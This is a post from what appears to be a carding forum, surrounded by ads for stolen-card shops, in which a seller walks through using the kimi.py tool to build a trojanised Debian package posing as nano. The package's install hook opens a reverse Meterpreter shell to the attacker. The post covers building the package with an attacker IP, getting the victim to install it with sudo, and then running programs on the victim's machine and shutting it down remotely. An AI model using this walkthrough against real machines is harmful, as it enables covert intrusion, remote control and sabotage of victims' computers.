banner Expire 1 October 2024
Ad Ends 13 October 2024
ad End 18 October 2024
banner Expire 1 November 2024
banner Expire 18 October 2024
banner Expire 20 October 2024
Ad Ends 13 October 2023
What's new
banner Expire 15 October 2024
Kfc CLub
BidenCash Shop
Western union transfer
CrdCrew.cc Carding forum
UniCvv
Ad expire at 5 August 2024
adv exp at 23 August 2024
Carding.pw carding forum

File_closed07

TRUSTED VERIFIED SELLER
Staff member
Joined
Jun 13, 2020
Messages
7,075
Reaction score
909
Points
212
Awards
2
  • trusted user
  • Rich User
Why would someone want to Target a system running on Linux ?

7-linux_traffic_light_7_thumb800.jpg





Over 60% of all web servers around the world are running variations of the Linux and a lot of personal Computers & Smart Phones. Lets just say Linux is everywhere from Traffic Lights to thermostats. Linux is now finding its way onto televisions, and even cars. As software creeps into practically every aspect of our lives, so does the OS designed by Linus Torvalds.

An attacker would target a Web Server or Personal System to gain remote access and gain a Shell this would allow an attacker to edit modify delete and execute processes from the target system as well as carry out further attacks.

Requirements:

Kali Linux (Attacker)
Computer running Linux Operating Sysem
kimi.py
Metasploit Framework

What is kimi?

Kimi is a script which generates Malicious debian package for metasploit
which consists of bash file. the bash file is deployed into “/usr/local/bin/” directory.
Backdoor gets executed just when victim tries to install deb package due to postinst file
Bash file injects and also acts like some system command which when executed by victim
and attacker hits with session.
Download Kimi

https://github.com/ChaitanyaHaritash/kimi
Lets start open up a new terminal and run kimi.py Python script.

Code:

python kimi.py





Screenshot-from-2017-04-09-20-42-31.png





Now we know that our script is working its now time to set reverse ip address and choose a version for our malicious Debian package.
To find your local ip address use command ifconfig from your terminal.

Code:


Screenshot-from-2017-04-09-20-45-14.png





Now we know what our local Ip Address is we can use this to configure our malicious payload.
In a terminal run kimi.py with these options replacing the IP Address with your own local ip address.

sudo python kimi.py -n nano -l 192.168.43.49 -V 1.0

What this command does is runs kimi and tells the script to build a malicious .DEB package of nano version 1.0.








After the script has finished creating the malicious .DEB file it will then spawn Metasploit Framework in XTerm.

Screenshot-from-2017-04-09-20-47-39.png





Now move the malicious payload across to the victim machine. I will be using a USB thumb drive and the Operating system I’ll be targeting is (Linux Kubuntu 64bit). however you can use what ever Linux Operating System you like considering it accepts building Debain Packages. Use what ever method suits your situation best for delivery of the payload.

Use dpkg -i to install the malicious package from the victim machine however you can double click the package to install it if you like.
Like many users I will follow trend and install my .DEB package with sudo rights.

Code:

sudo dpkg -i <deb-package>

Tip: (remember in Linux sudo can be your best friend or your worst enemy.) By the end of this guide you should understand why.




Screenshot-from-2017-04-09-20-52-35.png





You can see from the screen shot below we have now established a reverse meterpreter connection with the target machine.

Screenshot-from-2017-04-09-20-55-03.png





We can now list and connect to an established metapreter session.

To list sessions: session -i

Connection to a session: session -i 1

Now that we have established a metapreter shell we use use the help command to list available options on the target machine.





We will now execute a command and start a program on our target machine to achieve this we can use execute command with option -f.

Example: meterpreter > execute -f gimp





This command will execute a process id for gimp and run the software on the target machine.





Lets say for what ever reason we needed a detailed list of connections on the target network we could use ifconfig to list various information about the target network including Mac Address and Interface names and set various network modes.





We will now get the uid of the established session. This will help us tell if we are running the shell under a root or standard user.

Screenshot-from-2017-04-09-21-10-19.png





Lets shutdown the target system by executing a shutdown command we can achieve this by using the command execute followed by shutdown.

Any command that the Linux system allows can be executed by meterpreter including starting and restarting running services.
 
Ad End 1 October 2024
Top